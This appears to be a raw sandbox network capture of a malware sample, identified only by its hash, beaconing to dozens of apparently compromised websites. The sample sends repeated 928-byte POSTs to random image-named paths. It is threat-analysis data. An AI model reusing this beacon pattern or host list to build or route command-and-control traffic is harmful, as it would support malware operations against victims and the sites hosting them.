POST /data/pics/or.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: devlaur.com

Response

HTTP/1.1 405 Method Not Allowed

Date: Tue, 02 Apr 2024 13:55:55 GMT
Content-Length: 0
Connection: close
DNS

philippedebroca.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

philippedebroca.com

IN A

Response

philippedebroca.com

IN A

212.83.139.44
POST

https://philippedebroca.com/admin/image/ppwfmo.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

212.83.139.44:443

Request

POST /admin/image/ppwfmo.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: philippedebroca.com

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Tue, 02 Apr 2024 13:55:55 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.philippedebroca.fr/admin/image/ppwfmo.jpg
DNS

190.130.33.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.130.33.3.in-addr.arpa

IN PTR

Response

190.130.33.3.in-addr.arpa

IN PTR

a2aa9ff50de748dbeawsglobalacceleratorcom
DNS

www.philippedebroca.fr

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.philippedebroca.fr

IN A

Response

www.philippedebroca.fr

IN CNAME

philippedebroca.fr

philippedebroca.fr

IN A

212.83.139.44
GET

https://www.philippedebroca.fr/admin/image/ppwfmo.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

212.83.139.44:443

Request

GET /admin/image/ppwfmo.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.philippedebroca.fr

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:55:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.27
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.philippedebroca.fr/wp-json/>; rel="https://api.w.org/"
Strict-Transport-Security: max-age=15768000; includeSubDomains
DNS

44.139.83.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

44.139.83.212.in-addr.arpa

IN PTR

Response

44.139.83.212.in-addr.arpa

IN PTR

212-83-139-44revponeytelecomeu
DNS

kaminscy.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

kaminscy.com

IN A

Response

kaminscy.com

IN A

51.75.34.224
POST

https://kaminscy.com/uploads/images/xvrcakvaetjk.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

51.75.34.224:443

Request

POST /uploads/images/xvrcakvaetjk.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: kaminscy.com

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Tue, 02 Apr 2024 13:55:57 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Xss-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' https://bam.nr-data.net https://c.disquscdn.com https://disqus.com http://nominatim.openstreetmap.org https://googleads.g.doubleclick.net https://*.google-analytics.com/ https://widgets.wp.com/ https://api-iam.intercom.io/ wss://nexus-websocket-a.intercom.io/ https://my.yoast.com/ https://*.cloudfront.net ; script-src 'self' 'unsafe-inline' 'unsafe-eval' blob: https://js-agent.newrelic.com https://bam.nr-data.net https://*.addthis.com https://ssl.google-analytics.com/ga.js https://pagead2.googlesyndication.com https://static.doubleclick.net/instream/ad_status.js https://adservice.google.pl/adsid/integrator.js https://adservice.google.com/adsid/integrator.js https://ajax.googleapis.com https://a.disquscdn.com https://disqus.com https://*.disqus.com https://js-agent.newrelic.com https://*.static.am5.pl https://static.am5.pl https://connect.facebook.net https://*.wp.com https://secure.gravatar.com https://widgets.twimg.com/j/2/widget.js https://www.googletagmanager.com https://www.google-analytics.com https://c.disquscdn.com/ https://cdnjs.cloudflare.com/ data: https://platform.twitter.com/ https://www.gstatic.com/ https://widget.intercom.io/ https://js.intercomcdn.com/ https://www.wufoo.com/scripts/embed/form.js https://mlk0wjrutmkk.i.optimole.com/ https://skauci-pomorze.b-cdn.net/ https://beacon-v2.helpscout.net/ https://yoast.com/ https://www.google.com/ ; img-src https://*.gravatar.com/ https://c.disquscdn.com 'self' 'unsafe-inline' https://*.googlesyndication.com https://secure.gravatar.com https://s.yimg.com https://*.tile.openstreetmap.org https://*.staticflickr.com https://referrer.disqus.com https://a.disquscdn.com https://s-static.ak.facebook.com https://*.static.am5.pl https://static.am5.pl https://*.wp.com https://ssl.google-analytics.com https://s-ssl.wordpress.com https://www.google-analytics.com https://s.w.org https://ps.w.org data: https://*.googleusercontent.com/ https://*.shortpixel.ai/ blob: https://demo2wpopal.b-cdn.net/ https://en.wordpress.com/ https://cdn.gtranslate.net/ https://mlk0wjrutmkk.i.optimole.com/ https://skauci-pomorze.b-cdn.net/ https://bravepresets.b-cdn.net/ ; style-src 'self' 'unsafe-inline' https://a.disquscdn.com https://fonts.googleapis.com https://secure.gravatar.com https://*.static.am5.pl https://static.am5.pl https://*.disqus.com https://js-agent.newrelic.com https://*.wp.com https://c.disquscdn.com/ https://www.gstatic.com/ https://skauci-pomorze.b-cdn.net/ ; font-src 'self' data: https://fonts.gstatic.com https://themes.googleusercontent.com https://*.static.am5.pl https://static.am5.pl https://*.wp.com https://wordpress.com https://static2.sharepointonline.com/ https://skauci-pomorze.b-cdn.net/ ; frame-src 'self' https://jetpack.wordpress.com https://www.youtube.com https://www.facebook.com https://*.addthis.com https://accounts.google.com https://www.google.com https://calendar.google.com https://disqus.com https://*.facebook.com https://s-static.ak.facebook.com https://*.static.am5.pl https://static.am5.pl https://*.soundcloud.com https://*.disqus.com https://widgets.wp.com https://googleads.g.doubleclick.net data: https://platform.twitter.com/ https://syndication.twitter.com/ ; object-src 'none' ; frame-ancestors 'self'; connect-src 'self' https://media.getbrave.io/api/ https://cors.getbrave.io/;
DNS

www.kaminscy.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.kaminscy.com

IN A

Response

www.kaminscy.com

IN CNAME

kaminscy.com

kaminscy.com

IN A

51.75.34.224
DNS

www.kaminscy.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.kaminscy.com

IN A

Response

www.kaminscy.com

IN CNAME

kaminscy.com

kaminscy.com

IN A

51.75.34.224
GET

https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

51.75.34.224:443

Request

GET /uploads/images/xvrcakvaetjk.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.kaminscy.com

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:55:58 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Vary: Accept-Encoding
DNS

224.34.75.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

224.34.75.51.in-addr.arpa

IN PTR

Response

224.34.75.51.in-addr.arpa

IN PTR

s1am5pl
DNS

boompinoy.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

boompinoy.com

IN A

Response
DNS

webcodingstudio.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

webcodingstudio.com

IN A

Response

webcodingstudio.com

IN A

91.239.233.22
DNS

webcodingstudio.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

webcodingstudio.com

IN A

Response

webcodingstudio.com

IN A

91.239.233.22
POST

https://webcodingstudio.com/uploads/tmp/zplemxvx.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

91.239.233.22:443

Request

POST /uploads/tmp/zplemxvx.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: webcodingstudio.com

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:56:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.27
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://webcodingstudio.com/wp-json/>; rel="https://api.w.org/"
DNS

22.233.239.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.233.239.91.in-addr.arpa

IN PTR

Response

22.233.239.91.in-addr.arpa

IN PTR

skm261hostsilaorg
DNS

onlybacklink.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

onlybacklink.com

IN A

Response

onlybacklink.com

IN A

208.100.26.245
DNS

onlybacklink.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

onlybacklink.com

IN A

Response

onlybacklink.com

IN A

208.100.26.245
POST

https://onlybacklink.com/news/tmp/wcytkdtb.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

208.100.26.245:443

Request

POST /news/tmp/wcytkdtb.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: onlybacklink.com

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 02 Apr 2024 13:56:00 GMT
Content-Type: text/html
Content-Length: 580
Connection: close
DNS

victoriousfestival.co.uk

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

victoriousfestival.co.uk

IN A

Response

victoriousfestival.co.uk

IN A

35.177.75.40
POST

https://victoriousfestival.co.uk/include/graphic/wcfo.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

35.177.75.40:443

Request

POST /include/graphic/wcfo.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: victoriousfestival.co.uk

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Tue, 02 Apr 2024 13:56:01 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif
DNS

www.victoriousfestival.co.uk

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.victoriousfestival.co.uk

IN A

Response

www.victoriousfestival.co.uk

IN A

35.177.75.40
GET

https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

35.177.75.40:443

Request

GET /include/graphic/wcfo.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.victoriousfestival.co.uk

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:56:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.27
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.victoriousfestival.co.uk/wp-json/>; rel="https://api.w.org/"
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=15768000; includeSubDomains
DNS

40.75.177.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.75.177.35.in-addr.arpa

IN PTR

Response

40.75.177.35.in-addr.arpa

IN PTR

ec2-35-177-75-40 eu-west-2compute amazonawscom
DNS

40.75.177.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.75.177.35.in-addr.arpa

IN PTR

Response

40.75.177.35.in-addr.arpa

IN PTR

ec2-35-177-75-40 eu-west-2compute amazonawscom
DNS

245.26.100.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.26.100.208.in-addr.arpa

IN PTR

Response

245.26.100.208.in-addr.arpa

IN PTR

ip245 208-100-26staticsteadfastdnsnet
DNS

levdittliv.se

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

levdittliv.se

IN A

Response

levdittliv.se

IN A

188.114.96.2

levdittliv.se

IN A

188.114.97.2
POST

https://levdittliv.se/content/tmp/twxa.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

188.114.96.2:443

Request

POST /content/tmp/twxa.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: levdittliv.se

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 02 Apr 2024 13:56:02 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Tue, 02 Apr 2024 14:56:02 GMT
Location: https://fitforme.com/sv-se/vara-multivitaminer/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PxYk%2BMwS%2BaROab0Jh%2BloD%2FsWmR171dOtwqiFLN6xp52wZUBqQqv%2BK0MNC3jo8PcwNWi1ROSrF4X7UR0IMWlrpNF3WvH53tj5%2FL2fg95pJ%2BbwGfrWMvQ%2BrFLtx8mOGvnk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86e151ebac137761-LHR
alt-svc: h3=":443"; ma=86400
DNS

fitforme.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

fitforme.com

IN A

Response

fitforme.com

IN A

172.67.75.185

fitforme.com

IN A

104.26.9.199

fitforme.com

IN A

104.26.8.199
GET

https://fitforme.com/sv-se/vara-multivitaminer/

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

172.67.75.185:443

Request

GET /sv-se/vara-multivitaminer/ HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: fitforme.com

Response

HTTP/1.1 200 OK

Date: Tue, 02 Apr 2024 13:56:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
CF-Ray: 86e151ed1ea7652a-LHR
CF-Cache-Status: DYNAMIC
Cache-Control: s-maxage=5, stale-while-revalidate
Set-Cookie: NEXT_LOCALE=sv-se; HttpOnly; Secure; SameSite=Lax; Priority=High; Domain=fitforme.com; Expires=Wed Apr 02 2025 13:56:02 GMT+0000 (Coordinated Universal Time); Path=/;
Vary: Accept-Encoding
x-nextjs-cache: STALE
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5Y0eBXkNsUx6clnGuU4dULdvZZyyuLBSq1ETbK7qzxgPQZdXjHEyPnpnJdtQRBrj7InzgRRD7uM4MVGP9Z1Vphp43cMJbuFgqcMuaecXyYiNFicQ5q9j5Wuil2JTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
DNS

2.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.96.114.188.in-addr.arpa

IN PTR

Response
DNS

rosavalamedahr.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

rosavalamedahr.com

IN A

Response

rosavalamedahr.com

IN A

35.215.118.92
POST

https://rosavalamedahr.com/static/tmp/dwms.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

35.215.118.92:443

Request

POST /static/tmp/dwms.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: rosavalamedahr.com

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:56:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Cache-Enabled: True
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Link: <https://rosavalamedahr.com/wp-json/>; rel="https://api.w.org/"
X-Httpd: 1
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-Proxy-Cache-Info: DT:1
DNS

185.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.75.67.172.in-addr.arpa

IN PTR

Response
DNS

92.118.215.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.118.215.35.in-addr.arpa

IN PTR

Response

92.118.215.35.in-addr.arpa

IN PTR

9211821535bcgoogleusercontentcom
DNS

dupontsellshomes.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

dupontsellshomes.com

IN A

Response

dupontsellshomes.com

IN A

70.40.220.182
POST

https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

70.40.220.182:443

Request

POST /data/pictures/agzfktulhq.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: dupontsellshomes.com

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:56:05 GMT
Server: Apache
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
DNS

braffinjurylawfirm.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

braffinjurylawfirm.com

IN A

Response

braffinjurylawfirm.com

IN A

104.21.95.31

braffinjurylawfirm.com

IN A

172.67.142.162
POST

https://braffinjurylawfirm.com/uploads/pics/ulgz.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

104.21.95.31:443

Request

POST /uploads/pics/ulgz.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: braffinjurylawfirm.com

Response

HTTP/1.1 302 Found

Date: Tue, 02 Apr 2024 13:56:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
location: https://braffinjurylawfirm.com/
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://braffinjurylawfirm.com/wp-json/>; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d9HQOhbx3rMt6QQKICAh%2B5S1xjlVF52pwgLQRgU535gqzjJpweR5YdvjHZgaoKDv3zEegCsWGnauUQ4Hweh5bTKA8lRicZeVRlS4SlY9tAplsCSw%2FGDQnUo4X8mmOmi2htD96%2BQCB5u"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86e15202095e93f6-LHR
alt-svc: h3=":443"; ma=86400
DNS

182.220.40.70.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.220.40.70.in-addr.arpa

IN PTR

Response

182.220.40.70.in-addr.arpa

IN PTR

box2136bluehostcom
GET

https://braffinjurylawfirm.com/

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

104.21.95.31:443

Request

GET / HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: braffinjurylawfirm.com

Response

HTTP/1.1 200 OK

Date: Tue, 02 Apr 2024 13:56:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
link: <https://braffinjurylawfirm.com/wp-json/>; rel="https://api.w.org/", <https://braffinjurylawfirm.com/wp-json/wp/v2/pages/6>; rel="alternate"; type="application/json", <https://braffinjurylawfirm.com/>; rel=shortlink
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyhcS9ecMABuSGOycHrsgiSg57IdNHIh9huGrrAGu%2FawT2M2r0fkGQo%2B2auQpqd61JxVup3wF4nNUZueV6XrIisI%2B0Je7qcOeD46KyI2raPhwblphKyOYJ75Uo6usNtrQgTDUPqBIJLE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86e152091b5676d7-LHR
alt-svc: h3=":443"; ma=86400
DNS

31.95.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.95.21.104.in-addr.arpa

IN PTR

Response
DNS

xtptrack.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

xtptrack.com

IN A

Response

xtptrack.com

IN A

35.190.31.54
POST

https://xtptrack.com/data/pictures/pugigjqlcx.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

35.190.31.54:443

Request

POST /data/pictures/pugigjqlcx.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: xtptrack.com

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Tue, 02 Apr 2024 13:56:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 261
Connection: close
X-Content-Type-Options: nosniff
Location: https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg
X-CDN-C: static
X-SG-CDN: 1
X-Proxy-Cache-Info: DT:1
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
DNS

www.xtptrack.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.xtptrack.com

IN A

Response

www.xtptrack.com

IN A

34.120.190.48
GET

https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

34.120.190.48:443

Request

GET /data/pictures/pugigjqlcx.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.xtptrack.com

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:56:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Cache-Enabled: True
Link: <https://www.xtptrack.com/wp-json/>; rel="https://api.w.org/"
Set-Cookie: PHPSESSID=1299c1a213d6e11f60cf005955a2399c; path=/
X-Content-Type-Options: nosniff
X-Httpd: 1
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CDN-C: static
X-SG-CDN: 1
X-Proxy-Cache: MISS
X-Proxy-Cache-Info: 0 NC:000000 UP:SKIP_CACHE_SET_COOKIE
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
DNS

54.31.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.31.190.35.in-addr.arpa

IN PTR

Response

54.31.190.35.in-addr.arpa

IN PTR

543119035bcgoogleusercontentcom
DNS

gemeentehetkompas.nl

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

gemeentehetkompas.nl

IN A

Response
DNS

alsace-first.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

alsace-first.com

IN A

Response

alsace-first.com

IN A

213.186.33.4
DNS

alsace-first.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

alsace-first.com

IN A

Response

alsace-first.com

IN A

213.186.33.4
POST

https://alsace-first.com/content/images/tgwk.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

213.186.33.4:443

Request

POST /content/images/tgwk.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: alsace-first.com

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:56:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: Apache
X-Powered-By: PHP/5.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.alsace-first.com/wp-json/>; rel="https://api.w.org/"
DNS

48.190.120.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.190.120.34.in-addr.arpa

IN PTR

Response

48.190.120.34.in-addr.arpa

IN PTR

4819012034bcgoogleusercontentcom
DNS

4.33.186.213.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.33.186.213.in-addr.arpa

IN PTR

Response

4.33.186.213.in-addr.arpa

IN PTR

cluster003ovhnet
DNS

woodleyacademy.org

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

woodleyacademy.org

IN A

Response

woodleyacademy.org

IN A

208.95.242.12
POST

https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

208.95.242.12:443

Request

POST /uploads/temp/kzkszsprcr.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: woodleyacademy.org

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:56:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.21
